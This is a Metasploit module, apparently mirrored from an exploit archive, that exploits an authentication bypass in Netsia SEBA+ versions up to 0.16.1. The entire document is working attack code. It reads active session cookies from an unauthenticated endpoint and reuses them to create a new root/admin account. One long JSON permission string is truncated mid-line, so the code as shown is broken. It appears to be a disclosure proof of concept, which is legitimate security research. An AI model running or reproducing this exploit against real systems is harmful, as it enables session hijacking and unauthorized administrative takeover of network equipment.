Share
## https://sploitus.com/exploit?id=PACKETSTORM:160969
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' ,  
'Description' => %q{  
This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.  
HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,   
can be performed without the need for any session(cookie) information.   
Therefore, the session cookie informations of the active users in the application can be read from the response content.  
A new authorized user can be created with the obtained cookie.  
},  
'References' =>  
[  
[ 'CVE', '' ],  
[ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],  
[ 'URL', 'https://www.netsia.com' ]  
],  
'Author' =>  
[  
'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => "2021-01-06",  
'DefaultOptions' => { 'SSL' => true }  
))  
  
register_options(  
[  
Opt::RPORT(443),  
OptString.new('USERNAME', [true, 'The username for your new account']),  
OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])  
])  
end  
  
def peer  
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"  
end  
  
def check  
begin  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),  
)  
  
rescue  
return Exploit::CheckCode::Unknown  
end  
  
if res.code == 200 and res.body.include? 'sessionId'   
return Exploit::CheckCode::Vulnerable  
else   
if res.code == 200 and res.body.include? 'SUCCESS'  
print_status("Target is vulnerable! But active admin session was not found. Try again later.")  
return Exploit::CheckCode::Appears  
end  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def count_user(data, find_string)  
data.scan(/(?=#{find_string})/).count  
end  
  
def run  
unless Exploit::CheckCode::Vulnerable == check  
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')  
end  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),  
)  
sescount = count_user(res.body,'"name"')  
print_good("Currently #{sescount} active sessions have been detected.")  
  
cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)  
puts cookies  
$i = 0  
  
while $i <= sescount do  
sessloop = cookies[$i]  
sessid = "SESSION=" + sessloop.to_s  
cookie = sessid.split('"]').join('').split('["').join('')  
$i +=1  
json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subsc  
  
res = send_request_raw({  
'method' => 'POST',  
'ctype' => 'application/json',  
'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),  
'cookie' => cookie,  
'data' => json_data  
})  
  
if res.code == 200 and res.body.include? '"SUCCESS"'   
print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")  
print_good("Username : #{datastore["USERNAME"]}")  
print_good("Password : #{datastore["PASSWORD"]}")  
break  
end   
end  
end  
end